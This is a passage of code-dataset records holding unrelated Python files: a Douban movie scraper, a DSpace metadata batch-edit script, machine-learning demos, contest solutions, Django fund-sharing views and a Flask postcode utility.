created')\n\n\nlines_count = randint(90000, 100000)\nprint('Start creating {} RawData'.format(lines_count))\n\n\nsequence = [x for x in itertools.combinations([i for i in range(1, 1000)], 2)]\nfor n in range(lines_count):\n pair = choice(sequence)\n session.add(RawData(amount=randint(-100000, 100000), event_id=pair[0], user_id=pair[1]))\n sequence.remove(pair)\n\nsession.commit()\n\nprint('Finish creating test data')\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258915713","text":"# 导入相关库\r\nimport requests\r\nfrom lxml import etree\r\n#from openpyxl import workbook # 写入Excel表所用\r\n#from openpyxl import load_workbook # 读取Excel表所用\r\nfrom bs4 import BeautifulSoup as bs\r\nimport xlwt\r\nimport os\r\nprint(os.getcwd())\r\n#os.chdir('C:\\Users\\19652\\Desktop') # 更改工作目录为桌面\r\nfb=open('豆瓣电影.txt','w',encoding='utf-8')\r\n# 1.将目标网页的内容请求下来\r\nheaders = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\r\n \"Referer\": \"https://www.douban.com/\"\r\n}\r\ndouban_url = \"https://movie.douban.com/cinema/nowplaying/xian/\"\r\nresponse = requests.get(douban_url, headers=headers)\r\ndouban_text = response.text\r\n\r\n# 2.将抓取的数据进行处理\r\nhtml_element = etree.HTML(douban_text)\r\nul = html_element.xpath('//ul[@class=\"lists\"]')[0]\r\nlis = ul.xpath('./li')\r\nmovies = []\r\ntitles=[]\r\nscores=[]\r\nstars=[]\r\ndurations=[]\r\nregions=[]\r\ndirectors=[]\r\nactorss=[]\r\nposts=[]\r\nfor li in lis:\r\n title = li.xpath('./@data-title')[0]\r\n score = li.xpath('./@data-score')[0]\r\n star = 
li.xpath('./@data-star')[0]\r\n duration = li.xpath('./@data-duration')[0]\r\n region = li.xpath('./@data-region')[0]\r\n director = li.xpath('./@data-director')[0]\r\n actors = li.xpath('./@data-actors')[0]\r\n post = li.xpath('.//img/@src')[0]\r\n movie = {\r\n \"title\": title,\r\n \"score\": score,\r\n \"star\": star,\r\n \"duration\": duration,\r\n \"region\": region,\r\n \"director\": director,\r\n \"actors\": actors,\r\n \"post\": post\r\n }\r\n titles.append(title)\r\n scores.append(score)\r\n stars.append(star)\r\n durations.append(duration)\r\n regions.append(region )\r\n directors.append(director)\r\n actorss.append(actors)\r\n posts.append(post)\r\n movies.append(movie)\r\n rows = ''\r\nfor movie in movies:\r\n #print(movie['title'])\r\n row = '{}{}{}{}{}{}{}'.format(\r\n movie['title'],\r\n movie['score'],\r\n movie['star'],\r\n movie['duration'],\r\n movie['region'],\r\n movie['director'],\r\n movie['actors']\r\n )\r\n # 利用字符串拼接循环存储每个格式化的电影票房信息\r\n rows = rows + '\\n' + row # 利用字符串拼接处格式化的HTML页面\r\n piaofang_html = ''' \r\n \r\n 豆瓣电影 \r\n 豆瓣电影\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ''' \\\r\n + rows + '''
    电影名评分星级时长地区导演演员
    '''\r\n # 存储已经格式化的html页面\r\nwith open('douban.html', 'w', encoding='utf-8') as f :\r\n f.write(piaofang_html)\r\n#fb=open('豆瓣电影.xlsx','w',encoding='utf-8')\r\n#ws.append(['电影名', '评分', '五角星', '时长','国家/地区','导演', '主演', '海报'])\r\n\r\n # 读取存在的Excel表测试\r\n # wb = load_workbook('test.xlsx') #加载存在的Exce\r\nimport xlwt\r\nbook = xlwt.Workbook(encoding='utf-8',style_compression=0)\r\nsheet = book.add_sheet('mysheet',cell_overwrite_ok=True)\r\nmovies_info=[\"电影名\", \"评分\", \"五角星\",\"时长\",\"国家/地区\",\"导演\", \"主演\", \"海报\"]\r\nfor j in range(8):\r\n sheet.write(0,j,movies_info[j])\r\n\r\nfor i in range(len(titles)):\r\n sheet.write(i+1,0,titles[i])\r\n sheet.write(i+1,1,scores[i])\r\n sheet.write(i+1,2,stars[i])\r\n sheet.write(i+1,3,durations[i])\r\n sheet.write(i + 1, 4, regions[i])\r\n sheet.write(i + 1, 5, directors[i])\r\n sheet.write(i + 1, 6, actorss[i])\r\n sheet.write(i + 1, 7, posts[i])\r\nprint(\"结束\")\r\nbook.save('douban.xls')","sub_path":"猫眼爬虫/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31082608","text":"import json\nimport requests\nimport secrets\nimport time\nimport csv\nfrom datetime import datetime\nimport urllib3\nimport argparse\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nsecretsVersion = input('To edit production server, enter the name of the secrets file: ')\nif secretsVersion != '':\n try:\n secrets = __import__(secretsVersion)\n print('Editing Production')\n except ImportError:\n print('Editing Stage')\nelse:\n print('Editing Stage')\n\nbaseURL = secrets.baseURL\nemail = secrets.email\npassword = secrets.password\nfilePath = secrets.filePath\nverify = secrets.verify\nskippedCollections = secrets.skippedCollections\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--fileName', help='the CSV file of changes. 
optional - if not provided, the script will ask for input')\nargs = parser.parse_args()\n\nif args.fileName:\n fileName = args.fileName\nelse:\n fileName = input('Enter the file name of the CSV of changes (including \\'.csv\\'): ')\n\nstartTime = time.time()\ndata = {'email': email, 'password': password}\nheader = {'content-type': 'application/json', 'accept': 'application/json'}\nsession = requests.post(baseURL+'/rest/login', headers=header, verify=verify, params=data).cookies['JSESSIONID']\ncookies = {'JSESSIONID': session}\nheaderFileUpload = {'accept': 'application/json'}\ncookiesFileUpload = cookies\nstatus = requests.get(baseURL+'/rest/status', headers=header, cookies=cookies, verify=verify).json()\nprint('authenticated')\n\n\ndt_stamp = datetime.now().strftime('%Y-%m-%d %H.%M.%S')\n\nf = csv.writer(open('replacedKeyValuePair'+dt_stamp+'.csv', 'w'))\nf.writerow(['handle']+['itemID']+['oldKey']+['newKey']+['oldValue']+['newValue']+['delete']+['post'])\n\nf2 = csv.writer(open('notReplacedKeyValuePair'+dt_stamp+'.csv', 'w'))\nf2.writerow(['uri']+['oldKey']+['newKey']+['oldValue']+['newValue'])\n\nvalues_changed = 0\nvalues_unchanged = 0\nrow_count = 0\n\nwith open(fileName) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n row_count = row_count + 1\n uri = row['uri']\n uri = uri[28:]\n print(uri)\n oldKey = row['oldKey']\n newKey = row['newKey']\n oldValue = row['oldSubject']\n newValue = row['newSubject']\n if (oldValue != newValue) or (oldKey != newKey):\n uri_request = requests.get(baseURL+'/rest/'+uri, headers=header, cookies=cookies, verify=verify).json()\n itemLink = uri_request['link']\n metadata = requests.get(baseURL+itemLink+'/metadata', headers=header, cookies=cookies, verify=verify).json()\n itemMetadataProcessed = []\n for l in range(0, len(metadata)):\n metadata[l].pop('schema', None)\n metadata[l].pop('element', None)\n metadata[l].pop('qualifier', None)\n languageValue = metadata[l]['language']\n if metadata[l]['key'] == oldKey and metadata[l]['value'] == oldValue:\n updatedMetadataElement = {}\n updatedMetadataElement['key'] = newKey\n updatedMetadataElement['value'] = newValue\n updatedMetadataElement['language'] = languageValue\n itemMetadataProcessed.append(updatedMetadataElement)\n\n provNote = '\\''+oldKey+': '+oldValue+'\\' was replaced by \\''+newKey+': '+newValue+'\\' through a batch process on '+dt_stamp+'.'\n provNoteElement = {}\n provNoteElement['key'] = 'dc.description.provenance'\n provNoteElement['value'] = provNote\n provNoteElement['language'] = 'en_US'\n itemMetadataProcessed.append(provNoteElement)\n else:\n if metadata[l] not in itemMetadataProcessed:\n itemMetadataProcessed.append(metadata[l])\n itemMetadataProcessed = json.dumps(itemMetadataProcessed)\n delete = requests.delete(baseURL+itemLink+'/metadata', headers=header, cookies=cookies, verify=verify)\n print(delete)\n post = requests.put(baseURL+itemLink+'/metadata', headers=header, cookies=cookies, verify=verify, data=itemMetadataProcessed)\n print(post)\n f.writerow([uri]+[itemLink]+[oldKey]+[newKey]+[oldValue]+[newValue]+[delete]+[post])\n if post.status_code == 200:\n values_changed = values_changed + 1\n else:\n values_unchanged = values_unchanged + 1\n else:\n f2.writerow([uri]+[oldKey]+[newKey]+[oldValue]+[newValue])\n\nlogout = requests.post(baseURL+'/rest/logout', headers=header, cookies=cookies, verify=verify)\n\n\nprint('Original row count: {}'.format(row_count))\nprint('Total values or keys changed: {}'.format(values_changed))\nprint('Total values unchanged: 
{}'.format(values_unchanged))\nprint('total: '+(str(values_changed+values_unchanged)))\nelapsedTime = time.time() - startTime\nm, s = divmod(elapsedTime, 60)\nh, m = divmod(m, 60)\nprint('Total script run time: ', '%d:%02d:%02d' % (h, m, s))\n","sub_path":"replaceKeyValuePairsWithHandlesFromCSV.py","file_name":"replaceKeyValuePairsWithHandlesFromCSV.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534867683","text":"import sys\n\nsys.stdin = open('input_1289.txt', 'r')\n# sys.stdout = open('output_1239.txt', 'w')\n\nT = int(input())\n\nfor t in range(1, T+1):\n m = list(map(int, input()))\n\n r = [0 for _ in range(len(m))]\n\n cnt = 0\n for i in range(len(m)):\n if m[i] != r[i]:\n cnt += 1\n if m[i] == 1:\n for j in range(i, len(m)):\n r[j] = 1\n if m == r:\n break\n elif m[i] == 0:\n for j in range(i, len(m)):\n r[j] = 0\n if m == r:\n break\n print('#{} {}'.format(t, cnt))\n\n","sub_path":"SWEA/1289_원재의메모리복구하기.py","file_name":"1289_원재의메모리복구하기.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32570991","text":"\n\n#calss header\nclass _RIDDANCE():\n\tdef __init__(self,): \n\t\tself.name = \"RIDDANCE\"\n\t\tself.definitions = [u'said when you are pleased that a bad or unwanted thing or person, or something of poor quality, has gone: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_riddance.py","file_name":"_riddance.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"482316915","text":"\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QTextEdit ,QListWidget ,QTableView ,QComboBox,QLabel,QLineEdit,QTextBrowser\nimport sys ,pickle\nimport data_visualise\nimport table_display\nfrom PyQt5 import uic, QtWidgets ,QtCore, QtGui\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVR\nfrom sklearn import metrics\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport common\n\n\n\nclass UI(QMainWindow):\n def __init__(self,df,target,user_actions):\n super(UI, self).__init__()\n uic.loadUi(\"../ui_files/LogisticRegression.ui\", self)\n self.user_act=user_actions\n global data ,steps\n data=data_visualise.data_()\n steps=common.common_steps(df,target)\n self.X,self.n_classes,self.target_value,self.df,self.column_list=steps.return_data()\n self.target = self.findChild(QLabel,\"target\")\n self.columns= self.findChild(QListWidget,\"columns\")\n self.test_size= self.findChild(QLabel,\"test_size\") \n self.target = self.findChild(QLabel,\"target\")\n self.columns= self.findChild(QListWidget,\"columns\")\n self.test_size= self.findChild(QLabel,\"test_size\") \n \n self.c_=self.findChild(QLineEdit,\"c_\")\n self.penalty=self.findChild(QComboBox,\"penalty\")\n self.solver=self.findChild(QComboBox,\"solver\") \n self.dual=self.findChild(QComboBox,\"dual\") \n self.max_iter=self.findChild(QLineEdit,\"max_iter\")\n self.fit_inter=self.findChild(QComboBox,\"fit_inter\") \n self.multi_class=self.findChild(QComboBox,\"multi_class\")\n 
self.tol=self.findChild(QLineEdit,\"tol\")\n self.train_btn=self.findChild(QPushButton,\"train\")\n \n self.mae=self.findChild(QLabel,\"mae\")\n self.mse=self.findChild(QLabel,\"mse\")\n self.rmse=self.findChild(QLabel,\"rmse\")\n self.accuracy=self.findChild(QLabel,\"accuracy\")\n self.roc_btn=self.findChild(QPushButton,\"roc\")\n self.X_combo=self.findChild(QComboBox,\"X_combo\")\n self.Y_combo=self.findChild(QComboBox,\"Y_combo\")\n\n self.test_data=self.findChild(QLineEdit,\"test_data\")\n self.test_size_btn=self.findChild(QPushButton,\"test_size_btn\")\n self.train_btn.clicked.connect(self.training)\n self.conf_mat_btn=self.findChild(QPushButton,\"conf_mat\")\n #self.roc_btn.clicked.connect(self.roc_plot)\n self.conf_mat_btn.clicked.connect(self.conf_matrix)\n self.test_size_btn.clicked.connect(self.test_split)\n self.dwnld.clicked.connect(self.download_model)\n self.setvalue()\n self.show()\n\n def setvalue(self):\n self.target.setText(self.target_value)\n self.columns.clear()\n self.columns.addItems(self.column_list)\n self.X_combo.addItems(self.column_list)\n self.Y_combo.addItems(self.column_list)\n\n \n def test_split(self):\n\n self.x_train,self.x_test,self.y_train,self.y_test = train_test_split(self.df,self.X[self.target_value],test_size=float(self.test_data.text()),random_state=0)\n print(self.y_train.shape)\n print(self.y_test.shape)\n self.train_size.setText(str(self.x_train.shape))\n self.test_size.setText(str(self.x_test.shape))\n\n def download_model(self):\n\n name = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File','/home/akshay/Desktop',\"pickle(*.pkl)\")\n #file = open(name[0],'w')\n \n pkl_filename = name[0]\n with open(pkl_filename, 'wb') as file:\n pickle.dump(self.lr, file) \n \n self.user_act.save_file(pkl_filename) \n\n def training(self):\n\n self.lr = LogisticRegression(C=float(self.c_.text()),penalty=self.penalty.currentText(),dual=self.dual.currentText()=='True',tol=float(self.tol.text()),max_iter=float(self.max_iter.text()),fit_intercept=self.fit_inter.currentText()=='True',random_state=1,solver=self.solver.currentText(),multi_class=self.multi_class.currentText())\n self.lr.fit(self.x_train,self.y_train)\n \n self.pre=self.lr.predict(self.x_test)\n self.mae.setText(str(metrics.mean_absolute_error(self.y_test,self.pre)))\n self.mse.setText(str(metrics.mean_squared_error(self.y_test,self.pre)))\n self.rmse.setText(str(np.sqrt(metrics.mean_squared_error(self.y_test,self.pre))))\n self.accuracy.setText(str(accuracy_score(self.pre,self.y_test)))\n text=steps.classification_(self.y_test,self.pre)\n self.report.setPlainText(text)\n\n def conf_matrix(self):\n\n data = {'y_Actual':self.y_test.values,'y_Predicted':self.pre }\n df = pd.DataFrame(data, columns=['y_Actual','y_Predicted'])\n confusion_matrix = pd.crosstab(df['y_Actual'], df['y_Predicted'], rownames=['Actual'], colnames=['Predicted'])\n plt.figure()\n sns.heatmap(confusion_matrix, annot=True)\n plt.show()\n\n ","sub_path":"codes/logistic_reg.py","file_name":"logistic_reg.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33787759","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n#import random\n#import matplotlib.pyplot as plt\n#import math\n#from sklearn.datasets import load_iris\n\n\n# In[2]:\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\n\n# In[3]:\n\n\ndef inference(w, b, X): \n return sigmoid(np.dot(X,w) + b)\n\n\n# In[4]:\n\n\ndef eval_loss(w, b, X, y): \n 
h = inference(w, b, X)\n    # mean cross-entropy: average over samples (rows), not features\n    loss = -1 * np.sum(y*np.log(h)+(1-y)*np.log(1 - h)) / X.shape[0]\n    return loss\n\n\n# In[5]:\n\n\ndef gradient(w, b, X, y):\n    num_samples, nums_x = X.shape\n    h = inference(w, b, X)\n\n    dw = np.sum(X * (np.repeat((h-y),nums_x).reshape(num_samples,-1)), 0)/ num_samples\n    #np.repeat(np.expand_dims((h-y),1),nums_x,1)\n    db = np.sum(h-y) / num_samples\n\n    return dw, db\n\n\n# In[6]:\n\n\ndef cal_step_gradient(w, b, batch_x, batch_y, lr):\n    dw, db = gradient(w, b, batch_x, batch_y)\n    return w-dw*lr, b-db*lr\n\n\n# In[7]:\n\n\ndef train(X, y, batch_size, lr, max_iter):\n    num_samples, nums_x = X.shape\n    w = np.zeros(nums_x)\n    b = 0\n    \n    while max_iter:\n        batch_idxs = np.random.choice(num_samples, batch_size)\n        w, b = cal_step_gradient(w, b, X[batch_idxs], y[batch_idxs], lr)\n        loss = eval_loss(w, b, X, y)\n        if max_iter % 1000 == 0:\n            print('w:{0}, b:{1}'.format(w, b))\n            print('loss is {0}'.format(loss))\n        max_iter -= 1\n\n\n# In[8]:\n\n\ndef gen_sample_data():\n    num_samples = 400\n    # noise in [0, 1); use np.random since the `random` import is commented out above\n    w = np.random.randint(0, 10, size=4) + np.random.random()\n    b = np.random.randint(0, 5) + np.random.random()\n    X = np.random.randint(0, 200, size=(num_samples, 4)) * np.random.random()\n    y = np.dot(X,w) + b\n    y_ = np.array([1 if i > np.median(y) else 0 for i in y])\n    return X, y_, w, b\n\n\n# In[9]:\n\n\ndef run():\n    X, y, w, b = gen_sample_data()\n    print(w,b,np.sum(y),X.shape)\n    lr = 0.001\n    batch_size = 50\n    max_iter = 10000\n    train(X, y, batch_size, lr, max_iter)\n\nif __name__ == '__main__':\n    run()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"week3/logisticRegression.py","file_name":"logisticRegression.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"144044651","text":"INPUT_PATH = 'small.in'\n\ndef main():\n    test_cases = parse_input(INPUT_PATH)\n    solutions = []\n    for i, test_case in enumerate(test_cases):\n        print('-' * 10)\n        print('Test case', i)\n        solution = solve(*test_case)\n        print(test_case, '->', solution)\n        solutions.append(solution)\n    output_solutions(solutions)\n\n\ndef parse_input(path):\n    with open(path) as f:\n        n = int(f.readline())\n        lines = f.read().split('\\n')\n        test_cases = [tuple(map(int, line.split())) for line in lines][:n]\n    return test_cases\n\n\ndef output_solutions(solutions):\n    with open('output', 'w') as f:\n        for i, solution in enumerate(solutions, 1):\n            possible, matrix = solution\n            f.write('Case #{i}: {result}\\n'.format(i=i, result='POSSIBLE' if possible else 'IMPOSSIBLE'))\n            if possible:\n                for row in matrix:\n                    f.write(''.join(map(str, row)) + '\\n')\n\n\ndef solve(b, m):\n    # NOTE: b > 1\n    #print('solving for:', b, m)\n    max_paths = 2 ** (b - 2)\n    if m > max_paths:\n        return False, None\n    matrix = [[(1 if j > i else 0) for j in range(b)] for i in range(b)]\n    if m == max_paths:\n        return True, matrix\n    binary = bin(m)[2:][::-1]\n    for row in range(b-1):\n        if 1 <= row <= len(binary):\n            matrix[row][b-1] = int(binary[row-1])\n        else:\n            matrix[row][b-1] = 0\n    return True, matrix\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"solutions_5744014401732608_0/Python/arteffi/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"513462267","text":"from django import forms\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import Paginator\nfrom django.http import 
HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nimport json\nfrom .models import (Account, Funds, FundsManager, Beneficiary, Due, Notification) \nfrom .forms import (BeneficiaryForm, FundsForm)\nimport pdb\n\n\ndef info_view(information):\n return render('account/information.html', {\"information\": information})\n\n@login_required(login_url='login')\ndef account(request):\n acc = Account.objects.get(user=request.user.id)\n dues = acc.get_due_list()\n\n dues_page = []\n for username, due_list in dues.items():\n for funds_id, amount in due_list.items():\n dues_page.append((username, funds_id, amount))\n\n paginator = Paginator(dues_page, 6)\n page = request.GET.get('page')\n dues_page = paginator.get_page(page)\n\n dues = {}\n for username, funds_id, amount in dues_page.object_list:\n if username in dues:\n dues[username].update({funds_id: amount})\n else:\n dues.update({username: {funds_id: amount}})\n\n return render(request, 'account/account.html',{\n 'dues': dues,\n \"dues_page\": dues_page,\n 'account_value': acc.get_value(),\n 'user_name': request.user.username}\n )\n\n\n@login_required(login_url='login')\ndef funds(request, pk):\n funds = get_object_or_404(Funds, pk=pk)\n return render(request, 'account/funds.html', {'funds': funds})\n\n\n@login_required(login_url='login')\ndef myfunds(request):\n acc = Account.objects.get(user=request.user.id)\n paginator = Paginator(acc.funds_set.all().order_by('-date'), 8)\n page = request.GET.get('page')\n funds = paginator.get_page(page)\n return render(request, 'account/myfunds.html', {\"myfunds\": funds})\n\n\n@login_required(login_url='login')\ndef history(request):\n acc = Account.objects.get(user=request.user.id)\n paginator = Paginator(acc.get_history_funds(), 10)\n page = request.GET.get('page')\n history_funds = paginator.get_page(page)\n return render(request, 'account/history.html', {\"history_funds\": history_funds})\n\ndef post_funds(request, BeneficiaryFormSet, pk):\n form = FundsForm(request.POST)\n formset = BeneficiaryFormSet(request.POST)\n valid = False\n beneficiaries = {}\n if formset.is_valid() and form.is_valid():\n valid = True\n purpose = form.cleaned_data['purpose']\n purpose_price = form.cleaned_data['purpose_price']\n for f in formset:\n account = f.cleaned_data['account_id']\n contribution = f.cleaned_data['contribution']\n beneficiaries.update({account: contribution})\n else:\n for f in formset:\n if not f.is_valid():\n print(f.errors)\n\n if valid:\n if pk is None:\n funds = Funds.objects.create(\n owner=Account.objects.get(user=request.user),\n purpose=purpose,\n purpose_price=purpose_price\n )\n else:\n funds = Funds.objects.get(pk=pk)\n funds_manager = FundsManager(funds)\n funds_manager.update(purpose=purpose, purpose_price=purpose_price)\n funds_manager.update_beneficiaries(beneficiaries)\n return redirect(myfunds)\n\n return info_view(\"Nie udalo sie\")\n\n@login_required(login_url='login')\ndef edit_funds(request, pk):\n BeneficiaryFormSet = forms.formset_factory(BeneficiaryForm, extra=0)\n if request.method == 'POST':\n return post_funds(request, BeneficiaryFormSet, pk)\n else:\n funds = get_object_or_404(Funds, pk=pk)\n account = Account.objects.get(user=request.user)\n if account != funds.owner:\n return HttpResponse(\"Nie masz uprawnien do edytowania tej skladki\")\n form = FundsForm(initial={\n 'purpose': funds.purpose,\n 'purpose_price': funds.purpose_price\n })\n beneficiaries_form_set = []\n for beneficiary in funds.beneficiaries.all():\n 
beneficiaries_form_set.append({\n 'account_id': beneficiary.account.user.username,\n 'contribution': beneficiary.contribution\n })\n print(beneficiaries_form_set)\n formset = BeneficiaryFormSet(initial=beneficiaries_form_set)\n return render(request, 'account/edit_funds.html', {\n 'form': form,\n 'formset': formset,\n 'sum_of_contribution': funds.sum_of_contribution,\n 'owner': request.user.username\n })\n\n@login_required(login_url='login')\ndef new_funds(request):\n BeneficiaryFormSet = forms.formset_factory(BeneficiaryForm, extra=0)\n if request.method == 'POST':\n return post_funds(request, BeneficiaryFormSet, None)\n formset = BeneficiaryFormSet()\n form = FundsForm()\n return render(request, 'account/edit_funds.html', {\n 'form': form,\n 'formset': formset,\n 'sum_of_contribution': 0,\n 'owner': request.user.username\n })\n\n@login_required(login_url='login')\ndef delete_funds(request, pk):\n account = Account.objects.get(user=request.user)\n funds = get_object_or_404(Funds, pk=pk)\n if account != funds.owner:\n return redirect(myfunds)\n funds_manager = FundsManager(funds)\n funds_manager.delete_funds()\n return redirect(myfunds)\n\n\n@login_required(login_url='login')\ndef accounts(request):\n results = []\n if request.method == \"GET\":\n if u'query' in request.GET:\n value = request.GET[u'query']\n model_results = User.objects.filter(username__icontains=value)\n results = [x.username for x in model_results]\n return JsonResponse(json.dumps(results), safe=False)\n\n\n@login_required(login_url='login')\ndef new_notify(request):\n response = {\n \"new_notifications\": 0,\n \"message\": \"Nie ma nowej notyfikacji\"\n }\n if request.method == \"GET\":\n acc = Account.objects.get(user=request.user.id)\n new_notifications = acc.notifications_received.filter(seen=False)\n if new_notifications.exists():\n response[\"new_notifications\"] = new_notifications.count()\n response[\"message\"] = \"Sa nowe notyfikacje\"\n return JsonResponse(json.dumps(response), safe=False)\n\ndef send_notification(request):\n sent = None\n if request.method == \"GET\":\n if u'due_id' in request.GET:\n if u'due_type' in request.GET:\n due_type = int(request.GET[u'due_type'])\n due_id = request.GET[u'due_id']\n acc = Account.objects.get(user=request.user)\n due = Due.objects.get(pk=int(due_id))\n if due_type == 0:\n sent = acc.send_notification(due)\n elif due_type == 1:\n sent = acc.accept_notification(due)\n else:\n sent = acc.decline_notification(due)\n\n return sent\n\n@login_required(login_url='login')\ndef notify(request):\n response = {\n \"success\": False,\n \"message\": \"Nie udalo sie stworzyc notyfikacji\"\n }\n if request.method == \"GET\":\n if u'due_id' in request.GET:\n if u'due_type' in request.GET:\n due_type = int(request.GET[u'due_type'])\n due_id = request.GET[u'due_id']\n acc = Account.objects.get(user=request.user)\n due = Due.objects.get(pk=int(due_id))\n sent = acc.send_notification(due)\n if sent is not None:\n response[\"success\"] = True\n response[\"message\"] = \"Notyfikacja stworzona pomyslnie\"\n return JsonResponse(json.dumps(response), safe=False)\n\n@login_required(login_url='login')\ndef notify_back(request):\n if request.method == \"GET\":\n if u'noti_id' in request.GET:\n if u'answer' in request.GET:\n noti_id = int(request.GET[u'noti_id'])\n answer = int(request.GET[u'answer'])\n acc = Account.objects.get(user=request.user)\n noti = Notification.objects.get(pk=int(noti_id))\n noti.answered = True\n noti.save()\n due = noti.due\n if answer == 0:\n pass\n elif answer == 1:\n 
acc.accept_notification(due)\n else:\n acc.decline_notification(due)\n return redirect(notifications)\n\n@login_required(login_url='login')\ndef notifications(request):\n acc = Account.objects.get(user=request.user.id)\n paginator = Paginator(acc.notifications_received.filter(answered=False).order_by(\"-seen\",\"-latest_date\", \"-latest_datetime\"), 10)\n page = request.GET.get('page')\n notifications_received = paginator.get_page(page)\n for notification in acc.notifications_received.filter(seen=False):\n notification.seen = True\n notification.save()\n return render(request, 'account/notification.html',{\n \"notifications\": notifications_received,\n \"notification_types\": dict(Notification.Types.__members__)})\n pass\n","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"459703358","text":"#!/usr/bin python3\n\n# Imports\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Python:\nimport re\nfrom operator import itemgetter\nfrom typing import List, Dict, Union\nfrom functools import lru_cache\n\n# 3rd party:\nfrom flask import current_app as app\n\n# Internal:\nfrom ..common.caching import cache_client\nfrom ..common.data.queries import get_last_fortnight, change_by_metric\nfrom ..common.visualisation import plot_thumbnail, get_colour\nfrom ..common.data.variables import DestinationMetrics\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\npostcode_pattern = re.compile(r'(^[a-z]{1,2}\\d{1,2}[a-z]?\\s?\\d{1,2}[a-z]{1,2}$)', re.I)\nget_value = itemgetter(\"value\")\n\n# main_metric_names: List[str] = [\n# \"newCasesByPublishDate\",\n# \"newDeaths28DaysByPublishDate\",\n# \"newAdmissions\",\n# \"newPCRTestsByPublishDate\",\n# ]\n\n\n@lru_cache(maxsize=256)\ndef get_validated_postcode(params: dict) -> Union[str, None]:\n found = postcode_pattern.search(params.get(\"postcode\", \"\").strip())\n\n if found is not None:\n extract = found.group(0)\n return extract\n\n return None\n\n\n# @lru_cache(maxsize=256)\n\n\n@cache_client.memoize(60 * 60 * 6)\ndef get_card_data(timestamp: str, category: str, metric_data, graph=True, postcode=None):\n metric_name = DestinationMetrics[category][\"metric\"]\n change = change_by_metric(timestamp, category, postcode)\n\n colour = get_colour(change, metric_name)\n\n response = {\n \"data\": metric_data,\n \"change\": change,\n \"colour\": colour,\n \"latest_date\": metric_data[0][\"date\"].strftime('%-d %B %Y')\n }\n\n if graph:\n response[\"graph\"] = plot_thumbnail(metric_data, change, metric_name)\n\n return response\n\n\n@lru_cache(maxsize=256)\ndef get_fortnight_data(latest_timestamp: str,\n area_name: str = \"United Kingdom\") -> Dict[str, dict]:\n result = dict()\n\n for category, metric_data in DestinationMetrics.items():\n metric = DestinationMetrics[category][\"metric\"]\n metric_data = get_last_fortnight(latest_timestamp, area_name, category)\n result[metric] = get_card_data(latest_timestamp, category, metric_data)\n\n return result\n","sub_path":"app/postcode/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297464130","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport os\nfrom seismdb import SeismDb\nimport matplotlib\nimport 
